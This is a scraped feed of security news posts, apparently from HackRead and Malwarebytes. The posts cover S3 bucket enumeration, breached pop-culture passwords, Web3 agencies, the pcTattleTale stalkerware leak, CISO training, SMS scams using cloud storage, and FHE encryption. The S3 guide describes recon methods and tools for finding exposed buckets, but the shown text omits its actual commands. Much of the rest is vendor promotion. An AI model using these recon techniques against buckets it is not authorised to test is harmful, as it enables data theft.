By Daily Contributors
Amazon Web Services (AWS) Simple Storage Service (S3) is a foundational pillar of cloud storage, offering scalable object…
This is a post from HackRead.com Read the original post: In the jungle of AWS S3 Enumeration

Amazon Web Services (AWS) Simple Storage Service (S3) is a foundational pillar of cloud storage, offering scalable object storage for millions of applications. However, misconfigured S3 buckets can be a gateway to sensitive data exposure.

In this guide, we will delve into advanced methods for S3 bucket reconnaissance — essential for cloud pentesters and cloud security experts to identify and secure vulnerable buckets before they’re exploited.

****The Current Situation****

In the cloud monitoring service Datadog’s article on the state of security in AWS, they analyzed trends in the implementation of security best practices and took a closer look at various types of…

Credit: DatadogHQ

**36% of organizations with at least one Amazon S3 bucket have it configured to be publicly readable**. This is a significant cybersecurity risk, as publicly accessible S3 buckets can expose sensitive data to unauthorized individuals, leading to potential data breaches, data theft, and a host of compliance issues.

We could model the attack from a high-level point of view as follows:

Classical S3 Attack Path Scenario

In this article, we will focus on the recognition techniques used by attackers in part 1 of the figure above.

****Google Dorking to Locate Buckets****

Google Dorking utilizes advanced search queries to find hidden information on the internet. When it comes to S3 buckets, specific dorks can reveal buckets left exposed by inadvertent configurations.

Example Commands:

First command result example:

Search results will list web pages or direct links to S3 buckets. Verify the legitimacy of each link, as some may be outdated or reference non-existent buckets. For actual buckets, proceed to check the permissions and contents, ideally reporting any misconfigurations to the bucket owner.

****Burp Suite Exploration****

Burp Suite is a powerful tool for web application security pentesting. It can be used for S3 bucket reconnaissance by monitoring HTTP requests that contain bucket information.

Configure your browser to use Burp Suite as its proxy, then browse the target application. Burp Suite will automatically capture the traffic. Analyze the sitemap generated by Burp for any S3 bucket links or headers.

Look for patterns such as:

*   URLs containing “s3.amazonaws.com”
*   Headers with “x-am-bucket”

For instance:

Burp s3 keyword search through the proxy history

Also, the Burp plugin AWS Security Checks from the BApp Store can be really useful. The traffic analysis capabilities of Burp Suite allow for detailed scrutiny of web applications and potential S3 bucket discovery inside indirect or sub calls.

****GitHub Recon Tools****

There’s a treasure trove of S3 reconnaissance tools on GitHub. These tools range in functionality from scanning bucket names to checking for public accessibility and dumping contents.

S3Scanner: https://github.com/sa7mon/S3Scanner

Dumpster Diver: https://github.com/securing/DumpsterDiver

S3 Bucket Finder: https://github.com/gwen001/s3-buckets-finder

AWSInventorySync: https://github.com/foreseon/AWSInventorySync

Leveraging automated tools can vastly increase the efficiency and breadth of your reconnaissance. After running these tools, the next steps should involve assessing the identified buckets’ configurations, understanding the potential risks, and, if necessary, alerting the responsible parties.

****Online Websites****

Online resources can streamline the S3 bucket discovery process. Nuclei templates, specifically, are predefined patterns used to detect common vulnerabilities, including misconfigured S3 buckets.

For instance you can use:

*   Osint.sh/buckets
*   Buckets.grayhatwarfare

Tools like OSINT.sh and GrayHatWarfare are tailor-made to simplify the search process, pulling from pools of data that might take an individual researcher considerable time to amass.

What’s more, the existence of SaaS services accessible with just three clicks shows just how widespread this attack is these days. Hackers have even developed automated programs for scanning and collecting objects publicly exposed in S3 buckets.

****Regex Mastery****

Mastering simple regex can be one of the most efficient ways to conduct S3 bucket reconnaissance. By chaining simple commands, you can create powerful searches.

****Running Commands****

Here’s how to use regex with curl to extract S3 bucket URLs from JavaScript files:

And for using subfinder and httpx:

The command-line outputs will typically provide you with raw URLs or status codes. A 200 status code on an S3 bucket URL, for example, indicates that the bucket is accessible.

Further exploration of these command-line techniques offers granular control over the reconnaissance process and can be customized for specific scenarios. The output from these commands must be carefully analyzed to distinguish between normal bucket usage and potential security risks.

****Conclusion****

Navigating the complexities of AWS S3 Enumeration is crucial for identifying and securing misconfigured S3 buckets, which are potential gateways to sensitive data exposure.

Identifying these vulnerabilities is only the first step. Action must be taken to mitigate these risks, ensuring data remains secure against potential breaches. This is where Resonance Security steps in.

> Specializing in cloud security audits and penetration testing, we provide the expertise needed to protect and reinforce cloud environments against threats.
> 
> Resonance Security

For companies looking to enhance their cloud security posture, we offer tailored pentests & audits designed to meet the unique challenges of securing your cloud infrastructure. Learn more about how we can support your cloud security needs at Resonance Security.

In sum, the path to secure AWS S3 storage is multifaceted, demanding a proactive approach to security. With the right techniques and expert support, companies can navigate this landscape confidently, protecting their most valuable digital assets.

1.  Leaky database exposes fake Amazon product reviews scam
2.  9,517 unsecured databases identified with 10 billion records globally
3.  US and China Exposed Most DBs Among 308,000 Discovered in 2021
4.  Lesson from Casio’s Data Breach: Database Security is a Major Challenge
5.  Misconfigured ElasticSearch Servers Leaked 579GB of Users’ Site Activity

**As a Lead Security Engineer at Resonance Security, I play a pivotal role in shaping our cybersecurity landscape.**

In the jungle of AWS S3 Enumeration

By Deeba Ahmed
Is your password “Superman” or “Blink-182”? Millions are using these pop-culture favorites, making them easy targets for hackers.…
This is a post from HackRead.com Read the original post: Pop Culture Passwords Most Likely to Get You Hacked, New Study

Is your password “Superman” or “Blink-182”? Millions are using these pop-culture favorites, making them easy targets for hackers. Discover the most common leaked passwords in 2024 and learn how to create a super-secure one to protect your data.

When it comes to online security and privacy, passwords play a vital role in protecting our data and identities. However, with an ever-growing number of accounts to manage, it’s natural to resort to names of our favorite superheroes, actors, and sportsmen to avoid password fatigue.

A recent study by Mailsuite (formerly Mailtrack), shared with Hackread.com, highlights the downsides of using pop culture references as passwords. 

Researchers compiled a list of over 2,600 pop culture terms, including Superman, Blink-182, Eminem, and Hello Kitty, and their over 60,000 variations to identify the most hackable ones in 2024, based on their frequency in known data breaches and cross-references against the Pwned Passwords database. The results are enough to send shockwaves across the cybersecurity industry. 

****Here are the findings:****

“Superman” was declared the reigning champion of terrible passwords, having been compromised in a staggering 584,697 data breaches, challenging the myth that using fictional heroes’ names is safe.

The name “Eminem” was the most vulnerable music-related password, appearing in over 286,000 breaches and taking “mere seconds” to crack. Rapper 50 Cent’s name is the second most dangerous password, with 267,691 appearances in data breaches. Shakira comes in third with 57,848 appearances. 

“Blink-182” and “Metallica” are the most dangerous passwords among rock bands, with 482,244 and 264,913 appearances respectively.

Actors “Zac Efron” and “Brad Pitt” are the most dangerous passwords in 2024, appearing in 24,268 and 18,152 data breaches respectively. “Batman” and “Star Wars” are among the worst media franchise passwords, with Batman having the most data breaches (352,422) and Star Wars (323,546).

Games like “Minecraft,” “Left 4 Dead,” and “Pokémon” are common targets, with Minecraft topping the list by appearing in 215,934 data breaches. Pokémon, Mario, and Mega Man are the most dangerous characters to use as passwords.

The “New York Yankees” is the most dangerous sports-themed password, with the team appearing in 170,241 data breaches followed by the “Boston Red Sox.” The most dangerous athletes’ names for passwords include wrestler John Cena and golfer Tiger Woods, with 78,156 and 14,584 appearances, respectively.

To create a super-secure password, consider mixing upper and lowercase letters with numbers and symbols to enhance complexity. Aim for a length between 12-15 characters to increase security.

Additionally, opt for random combinations, avoiding easily guessable details like birthdates and names. Additionally, it’s crucial to avoid reusing passwords across different accounts to minimize the risk of data breaches.

1.  US, India and China Most Targeted in DDoS Attacks
2.  Revealed: The 200 Most Used and Worst Passwords
3.  List of most used passwords is here and it’s appalling
4.  Schools Are the Most Targeted Industry by Ransomware Gangs
5.  Signal, AI Gen Art Least, Amazon, Facebook Most Invasive Apps

Pop Culture Passwords Most Likely to Get You Hacked, New Study

By Waqas
This comprehensive Web3 guide explores its core principles, and real-world applications, and addresses the challenges and opportunities that…
This is a post from HackRead.com Read the original post: The Idea of Web3 and 7 Global Web3 Agencies

This comprehensive Web3 guide explores its core principles, and real-world applications, and addresses the challenges and opportunities that lie ahead. Learn how Web3 empowers users, fosters community ownership, and paves the way for a new era of a more open and equitable web.

The concept of Web3 has been building momentum and inspiring innovation worldwide. It promises a revolutionary change in the way we interact with the internet, offering a decentralized, community-driven alternative to the centralized platforms that dominate today’s web.

But what exactly is Web3, and why has it become such a buzzword? In this feature article, we delve into the origins of Web3, unpack its key principles, and explore the potential impact it could have on our digital lives.

Web3, also known as Web 3.0, is a vision for the third generation of internet development and usage. It builds upon the foundations of the current web (Web 2.0) but aims to address some of its inherent issues, such as centralized control, privacy concerns, and the platform-centric nature that often disadvantages users.

Fundamentally, Web3 is about decentralizing the internet, giving users greater control over their data, identity, and online interactions. It leverages blockchain technology, distributed systems, and cryptographic security to create a more open, transparent, and user-centric web.

**The Key Principles:**

*   **Decentralization (a)** **–** Web3 advocates for a distributed web where users can connect directly with each other without relying on centralized intermediaries. This is achieved through peer-to-peer networks and blockchain technology, which enables trustless interactions and shared control.
*   **Decentralization (b) –** Unlike Facebook or Google, which control vast amounts of user data, Web3 applications are built on decentralized networks like blockchain. This means data is distributed across multiple nodes, making it resistant to censorship and single points of failure.
*   **User Control and Ownership** **–** In Web3, users are meant to have sovereign control over their data, content, and digital assets. This means personal information is not siloed by large corporations, and users can choose how and when to share their data. Digital ownership is also enhanced through non-fungible tokens (NFTs) and blockchain-based assets, which are uniquely identifiable and transferable.
*   **Community Governance –** A key aspect of Web3 is the idea of community-driven governance. Many Web3 platforms are designed as decentralized autonomous organizations (DAOs), where decisions are made through consensus mechanisms and token-based voting. This shifts power from centralized entities to the community of users and creators.
*   **Interoperability and Open Standards** **–** Web3 promotes interoperability between different platforms, services, and blockchains. Using open standards and APIs, enables seamless interaction and data portability across the web, reducing platform lock-in.
*   **Incentivized Participation** **–** Web3 introduces new economic models where users are incentivized to contribute and engage. Through token rewards, users can earn value for their participation, content creation, or provision of resources. This aligns the interests of users and platforms more closely.

**Practical Examples:**

*   **Social Media and Content Platforms:** In Web3, social media platforms could be decentralized, with users owning their content and having a stake in the platform’s success. Platforms like Hive, Steemit, and Lens offer user-controlled content creation and reward systems, challenging the centralized models of Facebook or Twitter.
*   **NFTs and Digital Art:** Non-fungible tokens (NFTs) have become a prominent feature of Web3, allowing artists and creators to mint unique digital assets that can be traded or sold. Platforms like OpenSea and Rarible enable a new economy for digital art, collectibles, and even utility tokens with real-world benefits.
*   **Decentralized Finance (DeFi):** DeFi applications leverage blockchain technology to offer financial services without traditional intermediaries like banks. Users can borrow, lend, earn interest, and trade digital assets directly with each other. Platforms like MakerDAO and Compound are pioneering this space, offering decentralized alternatives to traditional finance.
*   **Metaverse and Virtual Worlds:** The metaverse, a persistent online virtual world, is closely tied to the Web3 vision. Decentraland and The Sandbox, for example, offer users the ability to own virtual land, create experiences, and interact with others in a decentralized, blockchain-based metaverse.

****Challenges and Criticisms:****

Web3 is not without its challenges and criticisms. Some question the scalability and user experience of decentralized platforms, while others raise concerns about regulatory complexities and potential misuse of blockchain-based systems. The environmental impact of certain blockchain consensus mechanisms has also been a point of contention, although many projects are now exploring more energy-efficient alternatives.

****7 Best Global Web3 Agencies****

Now that Web3 has become a global phenomenon, it also requires management. That’s where Web3 agencies come in. They provide expertise in blockchain, cryptocurrency, and decentralized applications, guiding companies into the future of the Internet. Therefore, here are 7 global Web3 agencies

**Coinband**

Coinband.io is a full-service web3 marketing agency with first-class customer experience and advanced growth marketing tools. With head offices in Dubai and Warsaw, the agency is at the forefront of Web3 marketing, specializing in token sales for projects and post-listing stage development.

Coinband offers a range of services including social media marketing (SMM), community management, public relations (PR), influencer marketing, paid advertising (PPC), SEO promotion, and website development. Among Coinband’s esteemed clientele are industry giants such as ByBit, OKX, ChainGPT, DAO Maker, Poolz, Uniswap, and NEAR.

****MarketAcross****

MarketAcross is a leading Web3, blockchain, and cryptocurrency PR and marketing agency. Established in 2015, it provides a comprehensive range of services tailored to the needs of startups and established blockchain companies.

Their offerings include public relations, content marketing, brand reputation management, social media promotions, influencer outreach, SEO, and community growth. The firm works with brands like Crypto.com, Binance, Avalanche, and Polkadot.

****Chainwire****

Chainwire is a specialized newswire syndication service tailored for the Web3, cryptocurrency, and blockchain sectors. It automates the distribution of press releases to a network of over 300 crypto-focused media outlets and mainstream news platforms such as Bloomberg, Yahoo Finance, MarketWatch, Benzinga, and NASDAQ.

This ensures that news and announcements from blockchain companies, cryptocurrency projects, and exchanges reach a wide and relevant audience. Chainwire has over 1,000 active clients and works with leading brands like Binance, BitGet, SUI, OKX, ByBit, and many more.

****Coinbound****

Coinbound is a leading digital marketing agency specializing in the cryptocurrency, blockchain, NFT, and Web3 sectors. Established in 2018, Coinbound offers a comprehensive suite of services designed to help Web3 companies grow and achieve their business goals.

Coinbound provides a wide range of services such as Influencer Marketing, Public Relations, PPC & Paid Ads, SEO, Lead Generation, Design & Development, and Fractional CMO Services. The agency has collaborated with prominent clients like MetaMask, Cosmos, Litecoin, and Immutable, solidifying its reputation as a leading agency in the Web3 marketing industry.

****NeoReach****

NeoReach is a California, United States-based crypto, blockchain, NFT and Web3 marketing agency focused on influencer marketing, assisting brands and agencies in connecting with influencers to develop and manage marketing campaigns. It offers tools for finding influencers, managing relationships, and evaluating campaign performance.

By utilizing data and analytics, NeoReach identifies the most suitable influencers for each brand, ensuring precise and effective marketing strategies. Companies use NeoReach to boost their social media reach and engagement by partnering with influencers across different sectors.

****Blockwiz****

Blockwiz is a Toronto, Canada-based full-service marketing agency dedicated to the cryptocurrency, Web3, and blockchain sectors. It provides services such as influencer marketing, content marketing, social media management, community management, and performance marketing.

Blockwiz supports blockchain projects and cryptocurrency businesses in increasing their visibility, engagement, and growth through customized marketing strategies.

****Lemonade****

Lemonade is a California, United States-based Web3 marketing agency that provides a comprehensive suite of services to help crypto and blockchain startups achieve their marketing goals. Their services include social media marketing, content marketing, influencer marketing, community management, and public relations.

**Conclusion:**

Web3 represents a bold vision for the future of the internet, offering a decentralized, user-controlled alternative to the centralized platforms of today. While it is still in its early stages, Web3 has the potential to reshape how we interact with the digital world, empowering users and fostering more open and equitable online communities.

As with any new model, there are challenges to overcome, but the principles of Web3 provide a compelling direction for the evolution of the web.

1.  Best Paid and Free OSINT Tools for 2024
2.  6 of the Best Crypto Bug Bounty Programs
3.  20 Best Amazon PPC Management Agencies
4.  The 10 Best Cybersecurity Companies in the UK
5.  10 Top DDoS Attack Protection and Mitigation Companies
6.  15 Best SaaS SEO Experts That Will Help You Dominate Online

The Idea of Web3 and 7 Global Web3 Agencies

Stalkerware app pcTattleWare had its websites defaced and databases leaked after researchers found several security flaws.

The idea behind the software is simple. When the spying party installs the stalkerware, they grant permission to record what happens on the targeted Android or Windows device. The observer can then log in on an online portal and activate recording, at which point a screen capture is taken on the target’s device.

What goes around comes around, you might say. As you may have read many times before on our blog, some spyware companies have a surprisingly low standard of security .

In 2021, we reported that “employee and child-monitoring” software vendor pcTattleTale hadn’t been very careful about securing the screenshots it sneakily took from its victims’ phones. A security researcher found an issue while using a trial version of pcTattleTale, noticing that the company uploaded the screenshots to an unsecured online database (meaning anyone could view the screenshots as they weren’t protected by any form of authentication—such as a user name and password).

Last week another security researcher, Eric Daigle, found the company appears to have learned nothing from its previous security issue. Daigle found that pcTattleTale’s Application Programming Interface (API) allows any attacker to access the most recent screen capture recorded from any device on which the spyware is installed. Despite repeated warnings from Daigle and others, no improvements were made.

Then, yet another researcher found yet another bug in pcTattletale which allowed them to gain full access to the backend infrastructure. This allowed them to deface the website and steal the AWS credentials which turned out to be the same for all devices. Amazon has now locked pcTattletale’s entire AWS infrastructure.

After a quick sweep, stalkerware researcher, Maia Crimew stated:

> “pcTattletale currently holds over 17 terabytes of victim device screenshots (upwards of 300 million of them from over 10 thousand devices), with some of them dating back to 2018.”

According to 2023 research from Malwarebytes, 62 percent of people in the United States and Canada admitted to monitoring their romantic partners online in one form or another, from looking through a spouse’s or significant other’s text messages, to tracking their location, to rifling through their search history, to even installing monitoring software onto their devices.

Given the low security of the apps available to home users, this is extremely concerning. Installing monitoring software is not just a huge invasion of privacy, there is a big chance that it will backfire.

**Removing stalkerware**

Malwarebytes, as one of the founding members of the Coalition Against Stalkerware, makes it a priority to detect and remove stalkerware-type apps from your device. It is good to keep in mind however that by removing the stalkerware-type app you will alert the person spying on you that you know the app is there.

Because the apps install under a different name and hide themselves from the user, it can be hard to find and remove them. That is where Malwarebytes can help you.

1.  Open your Malwarebytes dashboard
2.  Tap **Scan** **now**
3.  It may take a few minutes to scan your device.

 If malware is detected you can act on it in the following ways:

*   **Uninstall**. The threat will be deleted from your device.
*   **Ignore Always**. The file detection will be added to the Allow List, and excluded from future scans. Legitimate files are sometimes detected as malware. We recommend reviewing scan results and adding files to Ignore Always that you know are safe and want to keep.
*   **Ignore Once**: A file has been detected as a threat, but you are not sure whether to add it to your Allow List or delete. This option will ignore the detection this time only. It will be detected as malware on your next scan.

On Windows machines Malwarebytes detects pcTattleTale as PUP.Optional.PCTattletale.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 pcTattleTale spyware leaks database containing victim screenshots, gets website defaced 

By Cyber Newswire
Cary, United States, 28th May 2024, CyberNewsWire
This is a post from HackRead.com Read the original post: INE Security Enables CISOs to Secure Board Support for Cybersecurity Training

If there is a single theme circulating among Chief Information Security Officers (CISOs) right now, it is the question of how to get stakeholders on board with more robust cybersecurity training protocols.

There are key points debated about why you should provide cybersecurity training to your IT professionals, like the alarming increase in cyberattacks (an increase of 72% over the all-time high in 2021, according to the Identity Theft Research Center’s 2023 Data Breach Report), or the rapid evolution in technology, creating a constant game of catch-up.

But it isn’t a question of ”if” an organization will be targeted, but “when.” CISOs are increasingly anxious because while they realize the axe will fall on them when the inevitable breach occurs, securing boardroom support for heavy investment in preventative measures, like training, is challenging in a world where revenue is demanded each dollar spent.

“The path to securing the boardroom’s buy-in is more complex than simply having the right statistics and studies on paper,” says Dara Warn, the CEO of INE Security, a global cybersecurity training and certification provider. “To bridge the gap between CISOs and stakeholders, CISOs must adopt a strategic approach that combines financial impact data, relevant case studies, and compelling narratives. Framing cybersecurity training as an essential investment rather than an optional expense is critical.”

****The Human Factor in Cybersecurity****

Cybersecurity is not just about technology; it’s about people. Human error remains one of the leading causes of security breaches. A study by Verizon in their 2023 Data Breach Investigations Report found that 68% of breaches involved a human element, such as social engineering, misuse of privileges, or simple mistakes. This highlights the importance of equipping employees with the knowledge and skills to recognize and respond to potential threats.

****Case Study: Capital One Data Breach****

In 2019, Capital One experienced a data breach that exposed the personal information of over 100 million customers. The breach was caused by a misconfigured web application firewall, which allowed an attacker to access sensitive data stored on Amazon Web Services (AWS). This incident underscores the importance of training employees on cloud security practices and the proper configuration of security tools. In response, Capital One enhanced its cybersecurity training programs to include cloud security, emphasizing the need for regular audits and configuration checks. This case illustrates how specialized training can prevent costly breaches and protect sensitive data.

****The ROI of Cybersecurity Training****

Investing in cybersecurity training is not just a defensive measure; it’s a strategic investment that can yield significant returns. A well-trained workforce, not just security awareness but the SOC and networking teams, can serve as the first line of defense against cyber threats, reducing the likelihood of breaches and minimizing potential damages. According to the Ponemon Institute’s 2023 Cost of Data Breach Report, organizations with extensive incident response planning and testing programs saved $1.49 million compared to those with lower levels.

****Case Study: Maersk NotPetya Attack****

In 2017, shipping giant Maersk was hit by the NotPetya malware, which spread rapidly through its global network, causing a complete shutdown of its IT systems. The attack was initiated by a compromised software update, exploiting poor cybersecurity hygiene and a lack of employee training on identifying malicious software. The incident cost Maersk over $300 million in losses.

In response, Maersk implemented a comprehensive cybersecurity training program focusing on recognizing malicious software, securing software updates, and responding to cyber incidents. This case highlights the necessity of training employees on the latest cyber threats and best practices.

****Crafting a Compelling Narrative for the Boardroom****

The company’s financial data and case studies are important to secure, but communicating that to the boardroom remains a challenge for CISOs. To get the message across, CISOs must also craft a compelling narrative that resonates with the board members. Here are some key strategies:

****1\. Speak the Board’s Language****

Board members are often more attuned to financial metrics and business outcomes than technical jargon. CISOs should frame cybersecurity training as a business enabler that protects the organization’s bottom line. Highlighting the potential financial losses from breaches and the ROI of training programs can make a compelling case.

****2\. Use Real-World Examples****

Real-world case studies, like the attacks on Maersk NotPetya and Capital One, can illustrate the tangible impact of cybersecurity training. These examples provide relatable scenarios that underscore the importance of investing in employee education.

****3\. Leverage Data and Statistics****

Presenting data from reputable sources can lend credibility to the argument. Statistics that demonstrate the prevalence of human error in breaches and the financial benefits of training can be powerful tools in persuading the board.

****4\. Emphasize Regulatory Compliance****

Regulatory requirements, such as GDPR and CCPA, mandate stringent data protection measures. Failure to comply can result in hefty fines and reputational damage. Emphasizing how cybersecurity training can help meet these regulatory requirements can be an effective angle to secure board buy-in.

****5\. Highlight Competitive Advantage****

In an increasingly competitive market, robust cybersecurity measures can be a differentiator. Companies known for their strong security posture are more likely to attract and retain customers. CISOs can highlight how a comprehensive training program can enhance the organization’s reputation and competitive edge.

****Overcoming Common Objections****

Board members may raise objections regarding the cost and time required for cybersecurity training. CISOs should be prepared to address these concerns with data-driven arguments and strategic insights.

****Cost Concerns****

While the initial investment in training programs may seem significant, CISOs can emphasize the long-term cost savings from preventing breaches. According to the Ponemon Institute, the average cost of a data breach in 2023 was $4.45 million. Investing in training can mitigate these costs by reducing the likelihood and severity of breaches.

****Time Constraints****

Board members may worry about the time employees will spend on training. CISOs can advocate for flexible, modular training programs that allow employees to learn at their own pace without disrupting productivity. Additionally, emphasizing the efficiency of targeted training programs can alleviate concerns about time investment.

CISOs are key players in protecting their organizations from cyber threats. Getting the boardroom to buy into an investment in cybersecurity training is no easy task, but utilizing some of these strategies can make it more successful. Including these steps in the process of communicating your needs to stakeholders will help secure the support and resources needed to roll out effective training programs and ultimately better safeguard the organization’s digital and physical assets. The stakes are high, and having all stakeholders on the same team is critical to the long-term success and security of an organization.

****About INE Security****

INE Security is the premier provider of online technical training and cybersecurity certifications. Harnessing the world’s most powerful hands-on lab platform, cutting-edge technology, global video distribution network, and world-class instructors, INE is the top training choice for Fortune 500 companies worldwide, and for IT professionals looking to advance their careers. INE’s suite of learning paths offers an incomparable depth of expertise across cybersecurity, cloud, networking, and data science. INE is committed to delivering advanced technical training, while also lowering the barriers worldwide for those looking to enter and excel in an IT career.

**Contact**

**Press Team**  
**INE**  
**\[email protected\]**

INE Security Enables CISOs to Secure Board Support for Cybersecurity Training

By Deeba Ahmed
Fake Cloud, Real Theft!
This is a post from HackRead.com Read the original post: Top Cloud Services Used for Malicious Website Redirects in SMS Scams

SMS scammers are using cloud storage from Google, Amazon, and IBM to trick you! Learn how they’re doing it and how to protect yourself from these sneaky cloud phishing scams.

The threat intelligence unit at Enea, a software security firm based in Stockholm, Sweden, has uncovered a concerning trend: cybercriminals are exploiting cloud systems to perpetrate SMS scams including Smishing or SMS phishing.

According to the investigation by the company’s threat intelligence team, cloud storage services like Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage are being exploited to redirect users to malicious websites, stealing their information through SMS.

(Screenshot: Enea)

****How Cloud Storage is Exploited?****

Cloud storage allows organizations and individuals to store, access, and manage files, including static websites. However, cybercriminals have exploited this facility to host static websites with embedded spam URLs in their source code.

These URLs are distributed via authentic text messages, bypassing firewall restrictions. Mobile users click on links containing cloud platform domains, which direct them to the static website stored in the storage bucket, automatically forwarding or redirecting them without user awareness.

****The Scam: From SMS to Fake Websites****

According to Enea’s blog post that the company shared with Hackread.com ahead of publication on Thursday 23rd, 2024, the attackers prioritize two main objectives: delivering scam messages without network firewall detection and convincing end users to perceive the messages or links as trustworthy. 

The scam starts with a seemingly harmless text message (SMS). These messages often contain enticing offers or create a sense of urgency, tricking recipients into clicking a link. This link redirects them to a malicious website cleverly disguised as a legitimate one.

As per the research, Google Cloud Storage’s domain, “storage.googleapis.com,” is used by attackers to link to a static webpage hosted in a bucket on the platform. The spam website is loaded from that webpage using the “HTML meta refresh” method, a technique used in web development to automatically refresh or redirect a web page after a certain time period.

These fake websites, typically hosted on cloud storage buckets with names like “dfa-b.html” on Google Cloud Storage, aim to steal personal and financial information once users enter it. Users are directed to fraudulent websites offering gift cards to trick users into revealing personal and financial information. 

These SMS scammers have also been observed using links to static websites hosted on Amazon Web Services (AWS), IBM Cloud, and Blackblaze B2 Cloud.

Malicious text messages sent through popular cloud storage services (Screenshot: Enea)

****Mitigation Strategies****

Detecting and blocking URLs containing genuine Google Cloud Storage domains is challenging due to their association with legitimate domains from reputable companies. To protect yourself from cloud phishing scams, be cautious with suspicious SMS links, check website legitimacy before entering personal information, and enable multi-factor authentication (MFA) to add an extra layer of security.

1.  The Top 5 Cloud Vulnerabilities You Should Know Of
2.  Cloud security – An ongoing struggle to keep sensitive data safe
3.  New Vulnerability LeakyCLI Leaks AWS, Google Cloud Credentials
4.  Shadow IT: Personal GitHub Repos Expose Employee Cloud Secrets
5.  Dropbox Abused in New Phishing, Malspam Scam to Steal SaaS Logins

Top Cloud Services Used for Malicious Website Redirects in SMS Scams

By Uzair Amir
Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope…
This is a post from HackRead.com Read the original post: How FHE Technology Is Making End-to-End Encryption a Reality

Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope for truly secure messaging, cloud storage, and data analysis.

Encryption is like waterproofing: it needs to be all or not at all. Just as it makes no sense to waterproof a left shoe and leave the right unprotected, encrypting the consumer component of a messaging app is pointless if content can later be decrypted on cloud servers.

It’s called end-to-end encryption (E2EE) for a reason, but up until now many services claiming to utilize this technology have fallen woefully short. From an architectural perspective, E2EE is difficult to implement, particularly in applications that serve millions of users.

However, the emergence of a relatively new encryption technology is raising hope that E2EE may become a reality rather than an aspiration. Its name is Fully Homomorphic Encryption (FHE) and its unique design makes it ideally suited to services that are reliant on true end-to-end encryption.

**How End-to-End Encryption Works**

End-to-end encryption is a technology that’s meant to ensure that only users communicating with one another can read the messages. This could be two individuals chatting via a messaging application or it could be a business exchanging payment data with another entity such as a bank. Data is encrypted on the sender’s device and decrypted on the recipient’s device, preventing intermediaries, including service providers, from accessing the content.

This is achieved by using cryptographic keys that encode the message before transmitting it in encrypted form. The counterparty then decodes the message using its own cryptographic key in order to read its content. In addition to messaging apps such as Signal and Telegram, the technology is used by email providers, cloud storage services, and file-sharing platforms. It’s no exaggeration to say that E2EE is the backbone of the internet.

While E2EE can prove very effective at preventing third parties from intercepting messages, it is by no means bulletproof. Concerted attempts by adversaries, ranging from governments to state-sponsored hackers, to weaken encryption and introduce backdoors have resulted in many services that purport to use E2EE being vulnerable.

Critically, from the user’s perspective, there is no easy means of verifying whether encryption has been maintained throughout. As a result, individuals are compelled to take service providers at their word when they promise that messages are fully encrypted.

**How Encrypted Is Fully Encrypted?**

When a service claims to be end-to-end encrypted, it should be just that. In reality, implementations can differ wildly in terms of encryption strength. While it’s theoretically possible for users to check that the service they’re using is implementing robust encryption, it’s technically complex to do so, placing this ability beyond the reach of most users.

Telegram, for instance, allows users to verify that its open-source code is the same as that being used within its mobile applications and on desktop. However, this requires running a series of Terminal commands.

Telegram founder Pavel Durov has previously taken aim at other messaging applications, questioning the integrity of their E2EE. In his personal Telegram channel, he’s claimed: “An alarming number of important people I’ve spoken to remarked that their “private” Signal messages had been exploited against them in US courts or media. But whenever somebody raises doubt about their encryption, Signal’s typical response is “we are open source so anyone can verify that everything is all right”. That, however, is a trick.”

He then elaborates on the inability for users to verify that Signal’s Github code is the same as that running in the app. It should be noted that despite its claims to offer superior encryption, Telegram has also fielded accusations of weaknesses in its own E2EE implementation.

One of the challenges is that even when a service provider has implemented robust encryption, there is still the potential for messages to be deciphered. From weak key management to compromised devices due to malware, there’s a multitude of ways in which content can be accessed by adversaries. And when a key is compromised, unless the provider generates new keys for every session, it’s possible to decrypt the entire messaging history.

Finally, even when E2EE is working optimally, its implementation places additional computational demands on networks, resulting in increased latency and reduced performance, especially on devices with limited processing power or on blockchains where resources are capped. For this reason, E2EE is by no means impregnable. Can FHE solve some of these challenges, or will it run into the same problems that have weakened existing encryption protocols?

****FHE Meets E2EE****

One of the weak points with traditional E2EE is when it comes to decrypting the data: it’s here that there’s potential for a third party to gain access to it. FHE, in comparison, allows computation to be performed directly on encrypted data without decryption, ensuring that data remains protected throughout the entire process. This is its greatest attribute and the one that differentiates it from other encryption technologies.

It may be hard to visualize the benefit FHE brings to bear in this respect when considering a messaging application, in which the data must be decrypted before it can be read by the recipient. But consider another instance in which FHE proves superior at safeguarding data within E2EE systems: email. Here, FHE makes it possible for an email provider or cloud service to return results from an encrypted database without actually seeing the data.

This capability can also be extended to numerous other use cases in which data can be analyzed without disclosing its contents: analysts can run algorithms on encrypted datasets, with the results only decryptable by the intended recipient. Or machine learning models can be trained using encrypted data. This allows organizations to leverage powerful AI tools without compromising the privacy of the underlying data.

Within a blockchain context, fully homomorphic encryption also has significant potential, particularly in the construction of end-to-end encrypted applications for messaging or transmitting financial data. Fhenix, for example, is powered by fhEVM, a variation of the Ethereum Virtual Machine, that supports confidential smart contracts. As a result, confidential data can be analyzed and transmitted without its contents being disclosed.

Given that data remains encrypted at all stages with FHE – in transit, at rest, and during processing – it’s easy to see why developers are so excited about its potential for strengthening E2EE systems.

FHE can reduce the attack surface and ensure that sensitive data is never exposed to unauthorized parties, even during processing. This eliminates the need to trust service providers since they only handle encrypted data and mitigates the risks associated with data breaches. 

If FHE can achieve wider adoption, both in blockchain and traditional systems, end-to-end encryption may soon live up to its name, providing truly unbreakable data protection.

1.  WhatsApp Engineers Fear Encryption Flaw Exposes User Data
2.  8 tips to protect company data sent via home internet connections
3.  Signal, AI Generated Art Least, Amazon, Facebook Most Invasive Apps

How FHE Technology Is Making End-to-End Encryption a Reality

4BRO versions prior to 2024-04-17 suffer from insecure direct object reference and API information disclosure vulnerabilities.

